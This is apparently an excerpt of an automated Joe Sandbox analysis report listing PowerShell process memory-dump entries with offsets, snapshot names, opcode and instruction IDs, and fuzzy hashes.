                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d20afabff0040ed266c81c64545e3d9f721c950b03d3ee04b659a7c17ccad352
                                                                  • Instruction ID: dea213a974747b11df386aec153afa2825d9d7bb18a3eac3bc76a02b498ee0fb
                                                                  • Opcode Fuzzy Hash: d20afabff0040ed266c81c64545e3d9f721c950b03d3ee04b659a7c17ccad352
                                                                  • Instruction Fuzzy Hash: E621F4D3D0E7C65FF7A5BA7898690642FD09F5A562B0844FED0C9C71E3DC0818598352
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1713743773.00007FFB4AFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4afb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 20ec5a4cf4645725a120c44f3c8e563887cab03a22ff0dfa123be8a3497f8861
                                                                  • Instruction ID: abc3daccc3fc4cbdb4b68d728ac8deab87d007ebf931e010a352841ffa375637
                                                                  • Opcode Fuzzy Hash: 20ec5a4cf4645725a120c44f3c8e563887cab03a22ff0dfa123be8a3497f8861
                                                                  • Instruction Fuzzy Hash: B101677111CB0C8FD744EF0CE491AA5B7E0FB95364F10056DE58AC36A5DA36E892CB46
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 38151f0caed42661442a12aa3a3a30cbd45e056c4dd255e1fc065122fad5dc38
                                                                  • Instruction ID: 5ea80c62a6e4b23aa27fa04c71f00363f69ba9e7e0d940481273907f3f6f1d1e
                                                                  • Opcode Fuzzy Hash: 38151f0caed42661442a12aa3a3a30cbd45e056c4dd255e1fc065122fad5dc38
                                                                  • Instruction Fuzzy Hash: D4123AB290DBC90FEB97AF3898555A47FE0EF96221B0941FBE14CCB1A3D9189D06C351
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1714417155.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4b080000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b9cab399afcc2e5dc8861ee051402b2638be6a712cb3deba5b26f18fcb9eb18
                                                                  • Instruction ID: a51181e7d64b38aeff7a7e0c1e513bed8a37e9366cdc35a58a628b84af2babf1
                                                                  • Opcode Fuzzy Hash: 9b9cab399afcc2e5dc8861ee051402b2638be6a712cb3deba5b26f18fcb9eb18
                                                                  • Instruction Fuzzy Hash: BB121EA290EBC64FEBA6AB7C88651647FE0EF96211B0950FBE188C71E3DD089D45C351
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1713743773.00007FFB4AFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4afb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                  • API String ID: 0-2357752022
                                                                  • Opcode ID: ea72209359726bea7f4db15a892282502eb9f09699dd2b9b93a7c1d105a2a322
                                                                  • Instruction ID: 68037e1e0f294d52d72a28ac2141d2f781a79cddc6ea46135f9e38cea5411921
                                                                  • Opcode Fuzzy Hash: ea72209359726bea7f4db15a892282502eb9f09699dd2b9b93a7c1d105a2a322
                                                                  • Instruction Fuzzy Hash: 99C148B151CB894FE359EF38C8955B57BE1EFA6310B6401FED08AC71D3DA25B8428781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1713743773.00007FFB4AFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffb4afb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                  • API String ID: 0-2357752022
                                                                  • Opcode ID: 489016ddea36a3ff474b1d351a88e3f4383a2d027f624898099fd598f9341e10
                                                                  • Instruction ID: 534d42f3edbbbf3516d7265d256bd39f93eb1579253b300b5638e558578774f2
                                                                  • Opcode Fuzzy Hash: 489016ddea36a3ff474b1d351a88e3f4383a2d027f624898099fd598f9341e10
                                                                  • Instruction Fuzzy Hash: 552184D3D0DAD20FE3137E7895A90D46FA5AFB6224B5A01F6C1C88B0D3EE082C068251
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1534730553.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffb4b070000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f99d3c5a8859ab79398bdadbeec3716637edbd309f726adf206b4839822772b
                                                                  • Instruction ID: 284839d200363dc64eaa581155fa539d30325dd9a38082fac54344ed16382113
                                                                  • Opcode Fuzzy Hash: 1f99d3c5a8859ab79398bdadbeec3716637edbd309f726adf206b4839822772b
                                                                  • Instruction Fuzzy Hash: FFD155A290DAC94FEB66AF78C8555B5BFE0EF16312B0840FED18DC71A3D918AC49C351
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1534547771.00007FFB4AFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_7ffb4afa0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: f4e36bf976141f3ae44d2bde99f9e8ca55b7b915e4e717616995f75340790e0c
                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 4501677111CB0C8FD744EF0CE491AA5B7E0FB95364F10056DE58AC3691DA36E892CB45